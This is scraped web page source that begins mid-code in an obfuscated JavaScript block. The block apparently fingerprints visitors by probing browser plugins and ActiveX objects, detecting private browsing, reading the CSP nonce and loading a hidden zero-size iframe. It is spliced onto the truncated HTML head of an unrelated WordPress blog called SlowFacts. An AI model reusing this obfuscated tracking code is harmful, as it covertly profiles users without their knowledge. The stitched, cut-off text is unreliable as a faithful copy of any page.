Acrobat/i).test(td_OG)){td_pE=Number(890830).toString(31);}if(td_pE===Number(890830).toString(31)&&td_FT){var td_sb=/[\d][\d\.\_,-]*/.exec(td_FT); if(td_sb){td_pE=td_sb[0];}else{td_pE=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(110,9);}}return td_pE;}function td_XN(){var td_nO=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(0,5);if(navigator.platform&&(/linux/i).test(navigator.platform)){td_nO=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(0,5); }else{var td_fx=td_cJ([td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(119,15),td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(134,29),td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(163,16),td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(179,17)]); var td_fg=td_fx[0];if(td_fg!==td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(0,5)&&td_fg!==Number(890830).toString(31)&&(/QuickTime.*(Plug-in|Plugin).*/i).test(td_fg)){td_nO=Number(890830).toString(31); var td_sf=/[\d][\d\.\_,-]*/.exec(td_fg);if(td_sf){td_nO=td_sf[0];}}}return td_nO;}function td_Hu(){var td_dD=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(0,5);var td_gR=td_cJ([td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(196,22)]); var td_mq=td_gR[0];var td_cZ=td_gR[1];if(td_mq!==td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(0,5)&&td_mq!==Number(890830).toString(31)&&(/Shockwave for Director/i).test(td_mq)){td_dD=Number(890830).toString(31); }if(td_dD===Number(890830).toString(31)&&td_cZ){var td_jP=/[\d][\d\.\_,-]*/.exec(td_cZ);if(td_jP){td_dD=td_jP[0];}}return td_dD;}function td_Cf(){var td_dx=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(0,5); var td_jq=td_cJ([td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(218,40)]);var td_ls=td_jq[0];var td_AW=td_jq[1];if(td_ls!==td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(0,5)&&td_ls!==Number(890830).toString(31)&&(/RealPlayer.*Version.*/i).test(td_ls)){td_dx=Number(890830).toString(31); }if(td_dx===Number(890830).toString(31)&&td_AW){var td_NJ=/[\d][\d\.\_,-]*/.exec(td_AW);if(td_NJ){td_dx=td_NJ[0];}else{td_dx=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(258,3);}}return td_dx;}function td_o3(){var td_kS=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(0,5); var td_qd=td_cJ([td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(261,24)]);var td_ys=td_qd[0];var td_ED=td_qd[1];if(td_ys!==td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(0,5)&&td_ys!==Number(890830).toString(31)&&(/VLC.*(Plug-in|Plugin).*/i).test(td_ys)){td_kS=Number(890830).toString(31); }if(td_kS===Number(890830).toString(31)&&td_ED){var td_gT=/(Version) ([\d][\d\.]*[a-z]*)/.exec(td_ED);if(td_gT){td_kS=td_gT[2];}}return td_kS;}function td_cd(){var td_C7=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(0,5); var td_jm=td_cJ([td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(285,22)]);var td_Zt=td_jm[0];var td_hw=td_jm[1];if(td_Zt!==td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(0,5)&&td_Zt!==Number(890830).toString(31)&&(/DevalVR/i).test(td_Zt)){td_C7=Number(890830).toString(31); }if(td_C7===Number(890830).toString(31)&&td_hw){var td_nS=/(Plugin) ([\d][\d\.\,]*)/.exec(td_hw);if(td_nS){td_C7=td_nS[2];}}return td_C7;}function td_zt(){var td_mq=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(0,5); var td_zP=td_cJ([td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(307,13),td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(320,13)]);var td_Qb=td_zP[0];var td_DR=td_zP[1];if(td_Qb!==td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(0,5)&&td_Qb!==Number(890830).toString(31)&&(/SVG Viewer/i).test(td_Qb)){td_mq=Number(890830).toString(31); }if(td_mq===Number(890830).toString(31)&&td_DR){var td_nQ=/[\d][\d\.]*/.exec(td_DR);if(td_nQ){td_mq=td_nQ[0];}}return td_mq;}function td_Nd(){var td_I6=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(0,5); var td_EE=td_cJ([td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(333,25),td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(358,21),td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(379,23)]);var td_qx=td_EE[0]; var td_je=td_EE[1];if(td_qx!==td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(0,5)&&td_qx!==Number(890830).toString(31)&&(/Java/i).test(td_qx)){td_I6=Number(890830).toString(31);}if(td_I6===Number(890830).toString(31)&&td_je){var td_YT=/[\d][\d\._]*/.exec(td_je); if(td_YT){td_I6=td_YT[0];}}return td_I6;}function td_en(td_C8,td_VK){var td_Tu=null;var td_Xl=false;try{td_Tu=new ActiveXObject(td_C8);td_Xl=true;}catch(td_ZE){}if(typeof td_VK!==[][[]]+""){return td_Xl; }return td_Tu;}function td_fc(){var td_ng=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(402,29);var td_Q3,td_Fb=null,td_t1=null,td_WY=null;var td_Gj=15;var td_aT=2;for(td_Q3=td_Gj;td_Q3>td_aT;td_Q3--){td_t1=td_en(td_ng+"."+td_Q3); if(td_t1){td_Fb=td_Q3.toString();break;}}if(td_Fb==="6"){try{td_t1.AllowScriptAccess=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(431,6);}catch(td_uh){td_WY=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(437,8); }}else{if(td_t1){try{td_WY=td_t1.GetVariable(td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(445,8));var td_Ns=/[\d][\d\,\.\s]*[rRdD]{0,1}[\d\,]*/.exec(td_WY);if(td_Ns){td_WY=td_Ns[0];}else{td_WY=Number(890830).toString(31); }}catch(td_uh){td_WY=Number(890830).toString(31);}}}if(!td_WY&&td_Fb){td_WY=td_Fb;}if(!td_WY){td_WY=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(0,5);}return td_WY;}function td_TK(){var td_zd=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(453,12); var td_cX=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(0,5);var td_k1=td_en(td_zd);if(td_k1){td_cX=td_k1.versionInfo;}return td_cX;}function td_im(){var td_YD=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(465,11); var td_dx=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(476,13);var td_jm;var td_py=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(0,5);var td_gz=td_en(td_dx);if(!td_gz){var td_f1=10;var td_zL=1;for(td_jm=td_f1; td_jm>td_zL;td_jm--){td_gz=td_en(td_YD+"."+td_jm);if(td_gz){td_py=td_py.toString();break;}}if(!td_gz){td_gz=td_en(td_YD+td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(489,2));if(td_gz){td_py=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(491,3); }}}else{td_py=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(494,9);}return td_py;}function td_fH(){var td_i4=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(503,19);var td_pt=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(0,5); var td_YQ=null;try{td_YQ=td_en(td_i4);}catch(td_aM){}if(td_YQ){if(td_YQ.QuickTimeVersion){td_pt=td_YQ.QuickTimeVersion.toString(16);td_pt=td_pt.charAt(0)+"."+td_pt.charAt(1)+"."+td_pt.charAt(2);}else{td_pt=Number(890830).toString(31); }}return td_pt;}function td_SK(){var td_s0=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(522,11);var td_MD=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(0,5),td_PR=null,td_Qs;try{td_PR=td_en(td_s0).ShockwaveVersion(""); }catch(td_Qs){}if(typeof td_PR===td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(533,6)&&td_PR.length>0){td_MD=td_PR;}else{if(td_en(td_s0+td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(539,2),1)){td_MD="8"; }else{if(td_en(td_s0+td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(541,2),1)){td_MD="7";}else{if(td_en(td_s0+td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(489,2),1)){td_MD="6";}}}}return td_MD;}function td_pA(){var td_QM=0; var td_gC;var td_rk=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(0,5);var td_ZF=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(0,5);var td_iQ=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(0,5);var td_uE=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(0,5); var td_oX=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(0,5);var td_wK=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(0,5);var td_qU=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(0,5);var td_Ys=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(0,5); var td_U7=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(0,5);var td_Pd=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(0,5);if(td_jF&&td_jF.length){td_QM=td_jF.length;}if(window.ActiveXObject||td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(543,13) in window){if(td_QM>0){td_rk=td_rx(); }if(td_rk===td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(0,5)){td_rk=td_fc();}td_ZF=td_TK();td_iQ=td_im();td_uE=td_fH();td_oX=td_SK();}else{if(td_QM>0){td_rk=td_rx();td_ZF=td_nJ();td_iQ=td_II();td_uE=td_XN(); td_oX=td_Hu();td_wK=td_Cf();td_qU=td_o3();td_Ys=td_cd();td_U7=td_zt();td_Pd=td_Nd();}}td_gC=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(556,13)+td_rk+"!";td_gC+=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(569,28)+td_ZF+"!"; td_gC+=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(597,21)+td_iQ+"!";td_gC+=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(618,17)+td_uE+"!";td_gC+=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(635,17)+td_oX+"!"; td_gC+=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(652,18)+td_wK+"!";td_gC+=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(670,18)+td_qU+"!";td_gC+=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(688,15)+td_Ys+"!"; td_gC+=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(703,18)+td_U7+"!";td_gC+=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(721,12)+td_Pd;return td_gC;}td_3A.tdz_e066d412fd8447bd8be2d322fbac2439=new td_3A.td_0j("\x65\x30\x36\x36\x64\x34\x31\x32\x66\x64\x38\x34\x34\x37\x62\x64\x38\x62\x65\x32\x64\x33\x32\x32\x66\x62\x61\x63\x32\x34\x33\x39\x35\x35\x30\x31\x30\x34\x30\x35\x35\x30\x30\x31\x30\x37\x30\x35\x35\x65\x35\x64\x35\x39\x35\x36\x35\x37\x35\x33\x30\x37\x30\x32\x35\x64\x30\x63\x32\x63\x37\x34\x33\x36\x37\x32\x37\x66\x37\x37\x30\x66\x30\x34\x31\x33\x30\x32\x35\x66\x35\x31\x35\x36\x35\x34\x31\x35\x34\x34\x34\x66\x35\x37\x31\x36\x35\x64\x35\x30\x31\x66\x30\x32\x30\x64\x34\x62\x35\x35\x35\x36\x35\x62\x30\x37\x30\x30\x35\x39\x31\x30\x30\x63\x35\x33\x34\x39\x35\x62\x35\x62\x35\x36\x30\x32\x30\x37\x30\x66\x31\x30\x35\x33\x35\x61\x35\x37\x35\x62\x30\x61\x34\x38\x34\x35\x34\x32\x31\x64\x35\x38\x35\x34\x35\x31\x30\x39\x30\x38\x35\x37\x34\x36\x30\x65\x34\x35\x30\x35\x30\x36\x35\x39\x34\x61\x35\x35\x31\x65\x35\x34\x31\x66\x30\x32\x31\x65\x35\x36\x34\x62\x35\x61\x34\x33\x35\x34\x35\x38\x35\x63\x35\x38\x31\x31\x30\x61\x35\x61\x35\x33\x30\x32\x34\x30\x30\x61\x31\x32\x31\x36\x30\x62\x34\x62\x35\x64\x34\x30\x35\x65\x30\x64\x30\x61\x30\x32\x30\x33\x30\x37\x34\x31\x30\x62\x35\x66\x34\x37\x34\x36\x30\x33\x35\x39\x34\x31\x31\x37\x35\x64\x34\x34\x30\x39\x31\x34\x35\x37\x30\x30\x30\x36\x30\x64\x34\x34\x35\x38\x35\x34\x35\x34\x31\x32\x35\x65\x31\x35\x30\x36\x30\x34\x30\x37\x35\x39\x34\x34\x35\x61\x30\x64\x31\x37\x35\x36\x30\x31\x34\x31\x30\x38\x30\x32\x31\x36\x31\x61\x31\x32\x31\x31\x35\x31\x35\x61\x35\x63\x35\x37\x30\x36\x35\x35"); var td_3A=td_3A||{};if(typeof td_3A.td_3i===[][[]]+""){td_3A.td_3i=[];}td_3A.td_1T=function(){for(var td_K=0;td_K<td_3A.td_3i.length;++td_K){td_3A.td_3i[td_K]();}};td_3A.td_2D=function(td_H,td_i){var td_V=td_H.length+"&"+td_H; var td_G="";var td_z=td_3A.tdz_e066d412fd8447bd8be2d322fbac2439.td_f(0,16);for(var td_S=0,td_v=0;td_S<td_V.length;td_S++){var td_e=td_V.charCodeAt(td_S)^td_i.charCodeAt(td_v)&10;if(++td_v===td_i.length){td_v=0; }td_G+=td_z.charAt((td_e>>4)&15);td_G+=td_z.charAt(td_e&15);}return td_G;};td_3A.td_2Y=function(){try{var td_j=window.top.document;var td_T=td_j.forms.length;return td_j;}catch(td_H){return document;}}; td_3A.td_2d=function(td_K){try{var td_N;if(typeof td_K===[][[]]+""){td_N=window;}else{if(td_K==="t"){td_N=window.top;}else{if(td_K==="p"){td_N=window.parent;}else{td_N=window;}}}var td_r=td_N.document.forms.length; return td_N;}catch(td_t){return window;}};td_3A.add_lang_attr_html_tag=function(td_e){try{if(td_e===null){return;}var td_S=td_e.getElementsByTagName(Number(485781).toString(30));if(td_S!==null&&td_S.length>0&&td_S[0]!==[][[]]+""){td_S[0].setAttribute(Number(296632).toString(24),td_3A.tdz_e066d412fd8447bd8be2d322fbac2439.td_f(16,2)); }}catch(td_B){}};td_3A.load_iframe=function(td_l,td_f,td_z){var td_H=td_0Z(5);if(typeof(td_3j)!==[][[]]+""){td_3j(td_H,td_3A.tdz_e066d412fd8447bd8be2d322fbac2439.td_f(18,6));}var td_w=td_z.createElement(td_3A.tdz_e066d412fd8447bd8be2d322fbac2439.td_f(24,6)); td_w.id=td_H;td_w.title=td_3A.tdz_e066d412fd8447bd8be2d322fbac2439.td_f(30,5);td_w.setAttribute(td_3A.tdz_e066d412fd8447bd8be2d322fbac2439.td_f(35,13),Number(890830).toString(31));td_w.setAttribute(td_3A.tdz_e066d412fd8447bd8be2d322fbac2439.td_f(48,11),Number(890830).toString(31)); td_w.width="0";td_w.height="0";if(td_2c!==null){td_w.setAttribute(td_3A.tdz_e066d412fd8447bd8be2d322fbac2439.td_f(59,7),td_f);}td_w.setAttribute(td_3A.tdz_e066d412fd8447bd8be2d322fbac2439.td_f(66,5),td_3A.tdz_e066d412fd8447bd8be2d322fbac2439.td_f(71,83)); td_w.setAttribute(td_3A.tdz_e066d412fd8447bd8be2d322fbac2439.td_f(154,3),td_l);td_z.body.appendChild(td_w);td_3A.add_lang_attr_html_tag(td_z);};td_3A.csp_nonce=null;td_3A.td_1F=function(td_X){if(typeof td_X.currentScript!==[][[]]+""&&td_X.currentScript!==null){var td_x=td_X.currentScript.getAttribute(td_3A.tdz_e066d412fd8447bd8be2d322fbac2439.td_f(157,5)); if(typeof td_x!==[][[]]+""&&td_x!==null&&td_x!==""){td_3A.csp_nonce=td_x;}else{if(typeof td_X.currentScript.nonce!==[][[]]+""&&td_X.currentScript.nonce!==null&&td_X.currentScript.nonce!==""){td_3A.csp_nonce=td_X.currentScript.nonce; }}}};td_3A.td_0X=function(td_t){if(td_3A.csp_nonce!==null){td_t.setAttribute(td_3A.tdz_e066d412fd8447bd8be2d322fbac2439.td_f(157,5),td_3A.csp_nonce);if(td_t.getAttribute(td_3A.tdz_e066d412fd8447bd8be2d322fbac2439.td_f(157,5))!==td_3A.csp_nonce){td_t.nonce=td_3A.csp_nonce; }}};td_3A.tdz_f84032a327554bc1b8c2f42e19af82c8=new td_3A.td_0j("\x66\x38\x34\x30\x33\x32\x61\x33\x32\x37\x35\x35\x34\x62\x63\x31\x62\x38\x63\x32\x66\x34\x32\x65\x31\x39\x61\x66\x38\x32\x63\x38\x34\x30\x34\x38\x35\x39\x30\x64\x34\x61\x35\x37\x31\x32\x35\x64\x35\x64\x37\x34\x35\x64\x34\x37\x35\x62\x30\x66\x30\x36\x37\x65\x31\x32\x35\x64\x31\x31\x35\x33\x32\x30\x35\x64\x34\x30\x30\x30\x35\x37\x35\x36\x31\x39\x32\x33\x34\x30\x34\x32\x30\x66\x35\x37\x31\x34\x35\x64\x34\x36\x36\x33\x35\x32\x35\x34\x30\x30\x34\x31\x35\x62\x30\x32\x35\x30\x35\x33\x30\x31\x35\x34\x30\x37\x35\x34\x30\x37\x30\x64\x35\x34\x30\x35\x30\x37\x35\x32"); var td_3A=td_3A||{};function td_0r(){var td_iG;var td_zw;var td_bP=td_1x.td_1m;var td_FE=parseInt(td_1x.td_3R);this.tryAgain=function(){return false;};this.getFPParams=function(){var td_AB=td_3A.tdz_f84032a327554bc1b8c2f42e19af82c8.td_f(0,4); if(typeof td_iG===[][[]]+""){if(typeof td_zw!==[][[]]+""&&td_zw.readyState===Number(218714).toString(25)){td_iG=td_zw.result?false:true;}else{return null;}}td_AB+=td_iG?td_3A.tdz_f84032a327554bc1b8c2f42e19af82c8.td_f(4,3):td_3A.tdz_f84032a327554bc1b8c2f42e19af82c8.td_f(7,2); return td_AB;};this.setup=function(){if((td_bP===td_3A.tdz_f84032a327554bc1b8c2f42e19af82c8.td_f(9,6)||td_bP===td_3A.tdz_f84032a327554bc1b8c2f42e19af82c8.td_f(15,5))&&window.webkitRequestFileSystem){window.webkitRequestFileSystem(window.TEMPORARY,1,function(){td_iG=false; },function(td_bj){td_iG=true;});}else{if(td_bP===td_3A.tdz_f84032a327554bc1b8c2f42e19af82c8.td_f(20,7)&&window.indexedDB){if(typeof td_zw===[][[]]+""){try{td_zw=window.indexedDB.open(Number(796469).toString(30)); }catch(td_xD){td_iG=true;}}}else{if(td_bP===td_3A.tdz_f84032a327554bc1b8c2f42e19af82c8.td_f(27,8)&&td_FE>=10){td_iG=false;try{if(!window.indexedDB){td_iG=true;}}catch(td_xD){td_iG=true;}}else{if(td_bP===td_3A.tdz_f84032a327554bc1b8c2f42e19af82c8.td_f(35,6)&&window.localStorage){try{window.localStorage.setItem(td_3A.tdz_f84032a327554bc1b8c2f42e19af82c8.td_f(41,13),1); }catch(td_xD){td_iG=true;}if(typeof td_iG===[][[]]+""){td_iG=false;window.localStorage.removeItem(td_3A.tdz_f84032a327554bc1b8c2f42e19af82c8.td_f(41,13));}if(td_iG===false){try{window.openDatabase(null,null,null,null); }catch(td_xD){td_iG=true;}}}}}}};}td_1l();
0
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>SlowFacts | Fast opinions come and go. Here are the slow facts.</title> <!--[if lt IE 8]><link rel="stylesheet" type="text/css" media="screen" href="https://s2.wp.com/wp-content/themes/pub/vigilance/stylesheets/ie.css" /><![endif]--> <!--[if lte IE 6]><link rel="stylesheet" type="text/css" media="screen" href="https://s2.wp.com/wp-content/themes/pub/vigilance/stylesheets/ie6.css" /><![endif]--> <link rel="pingback" href="https://slowfacts.wordpress.com/xmlrpc.php" /> <link rel='dns-prefetch' href='//s2.wp.com' /> <link rel='dns-prefetch' href='//s1.wp.com' /> <link rel='dns-prefetch' href='//s0.wp.com' /> <link rel="alternate" type="application/rss+xml" title="SlowFacts &raquo; Feed" href="https://slowfacts.wordpress.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="SlowFacts &raquo; Comments Feed" href="https://slowfacts.wordpress.com/comments/feed/" /> <script type="text/javascript"> /* <![CDATA[ */ function addLoadEvent(func) { var oldonload = window.onload; if (typeof window.onload != 'function') { window.onload = func; } else { window.onload = function () { oldonload(); func(); } } } /* ]]> */ </script> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s0.wp.com\/wp-content\/mu-plugins\/wpcom-smileys\/twemoji\/2\/72x72\/","ext":".png","svgUrl":"https:\/\/s0.wp.com\/wp-content\/mu-plugins\/wpcom-smileys\/twemoji\/2\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/s1.wp.com\/wp-includes\/js\/wp-emoji-release.min.js?m=1556893897h&ver=5.2"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='all-css-0-1' href='https://s2.wp.com/_static/??-eJyNUVtSwzAMvBCuKFD6xXAWx1FdNZbtiWUyuT1KCuHV8fDjWT125ZVgysalKBgFuJocqqdYYMousSlMAedf0c6Vcge3aYEGLHBBydYNZo1a7RRPFEnmDfyrWc7IOiXXDt7IU7DR4Uak6ELttawJ6KkIdCGtf+lGO85QZA64Y4qtUS6NqHnOVpYOxp4sBp0apUXj/PzJWuBZd9C0f11r1+URSzH6MlU2V3t/eLdcf7hpjaDeoxTAqtU0EJpgJxDkHKyo3DcBgpiEVKNsoKXsMRndrBVK8UdgTsHS2KKOqDfxCv16pa9wIb3yy/5wOD487Y+P95d3nb/8yQ==?cssminify=yes' type='text/css' media='all' /> <link rel='stylesheet' id='print-css-1-1' href='https://s2.wp.com/wp-content/mu-plugins/global-print/global-print.css?m=1465851035h&cssminify=yes' type='text/css' media='print' /> <link rel='stylesheet' id='all-css-2-1' href='https://s0.wp.com/_static/??-eJx9i0EKAjEMRS9kzQxad+JZMqW2kTQpTQavLy5EZAZX/314D549JBXP4tDW0HktJAaYnFQWHF86JrMD7OtdzcOdkQZYxUFSPvuvMk2EHFiL/p5N5DW3bFDPUFgX5Ldwa9c5xssUT1OcHy/FOEmr?cssminify=yes' type='text/css' media='all' /> <script type='text/javascript' src='https://s0.wp.com/_static/??-eJyF0FEKwjAMBuAL2RVdh0/iWWqNI3VNa5M69PRWmIhQFQJ5yAf5Ez0nheSmcgTWvtalQL4trfO80r+ACjhmK9AFpBd2kQRInjZFlgDMdoTGNMQDTqAKQ66ApK45xYb7jIR0RZj/Mg+SrDurDIx3aB3C6Z35+wcWtQ+79TCYTd9vjfEPs3xy+Q=='></script> <link rel='stylesheet' id='all-css-0-2' href='https://s0.wp.com/wp-content/mu-plugins/highlander-comments/style.css?m=1530132353h&cssminify=yes' type='text/css' media='all' /> <!--[if lt IE 8]> <link rel='stylesheet' id='highlander-comments-ie7-css' href='https://s2.wp.com/wp-content/mu-plugins/highlander-comments/style-ie7.css?m=1351637563h&#038;ver=20110606' type='text/css' media='all' /> <![endif]--> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://slowfacts.wordpress.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://s1.wp.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress.com" /> <link rel='shortlink' href='https://wp.me/1yMbi' /> <!-- Jetpack Open Graph Tags --> <meta property="og:type" content="website" /> <meta property="og:title" content="SlowFacts" /> <meta property="og:description" content="Fast opinions come and go. Here are the slow facts." /> <meta property="og:url" content="https://slowfacts.wordpress.com/" /> <meta property="og:site_name" content="SlowFacts" /> <meta property="og:image" content="https://s0.wp.com/i/blank.jpg" /> <meta property="og:locale" content="en_US" /> <meta name="twitter:site" content="@wordpressdotcom" /> <meta property="fb:app_id" content="249643311490" /> <!-- End Jetpack Open Graph Tags --> <link rel="shortcut icon" type="image/x-icon" href="https://s1.wp.com/i/favicon.ico" sizes="16x16 24x24 32x32 48x48" /> <link rel="icon" type="image/x-icon" href="https://s1.wp.com/i/favicon.ico" sizes="16x16 24x24 32x32 48x48" /> <link rel="apple-touch-icon-precomposed" href="https://s2.wp.com/i/webclip.png" /> <link rel='openid.server' href='https://slowfacts.wordpress.com/?openidserver=1' /> <link rel='openid.delegate' href='https://slowfacts.wordpress.com/' /> <link rel="search" type="application/opensearchdescription+xml" href="https://slowfacts.wordpress.com/osd.xml" title="SlowFacts" /> <link rel="search" type="application/opensearchdescription+xml" href="https://s1.wp.com/opensearch.xml" title="WordPress.com" /> <style id="wpcom-hotfix-masterbar-style"> @media screen and (min-width: 783px) { #wpadminbar .quicklinks li#wp-admin-bar-my-account.with-avatar > a img { margin-top: 5px; } } </style> <style type="text/css" media="screen"> body { background-color: #fdfdfd; } #wrapper{ padding: 0 20px 10px 20px; border-left: 4px solid #ffffff; border-right: 4px solid #ffffff; } .sticky .entry { background-color: ##ffffff; padding: 10px; } .alert-box, .highlight-box { border: 1px solid #ffffff; } #content a:link, #content a:visited { color: #102ecf; } #sidebar a:link, #sidebar a:visited { color: #102ecf; } #title a:hover { color: #102ecf; } #nav ul li a:hover, #nav ul li:hover > a, #nav ul li.current_page_item > a, #nav ul li.current_page_parent > a, #nav ul li.current_page_ancestor > a, #nav ul li.current-cat > a, #nav ul li.current-menu-ancestor > a, #nav ul li.current-menu-item > a, #nav ul li.current-menu-parent a { color: #102ecf; border-top: 4px solid #102ecf; } .post-header h1 a:hover, .post-header h2 a:hover { color: #102ecf; } .comments a:hover { color: #102ecf; } .meta a:hover { color: #102ecf; } .post-footer a:hover { color: #102ecf; } #footer a:hover { color: #102ecf; } #content .entry a:hover { color: #58181b; } #wrapper #sidebar a:hover { color: #58181b; } #content .post-header h1 a:hover, #content .post-header h2 a:hover { color: #102ecf; } #content .comments a:hover { color: #102ecf; } #content .meta a:hover { color: #102ecf; } #content .reply a:hover { color: #102ecf; } #content .reply a:link, #reply .c-permalink a:visited { color: #aaa; } #content .c-permalink a:link, #content .c-permalink a:visited { color: #ccc; } #content .post-footer a:link, #content .post-footer a:visited { color: #333; } #content .comments a { color: #757575; } #footer a:hover { color: #102ecf; } #footer a:link, #footer a:visited { color: #666; } </style> <style type="text/css" media="screen"> #wrapper{ background: #fff; } #content .post-header h1 a:link, #content .post-header h1 a:visited, #content .post-header h2 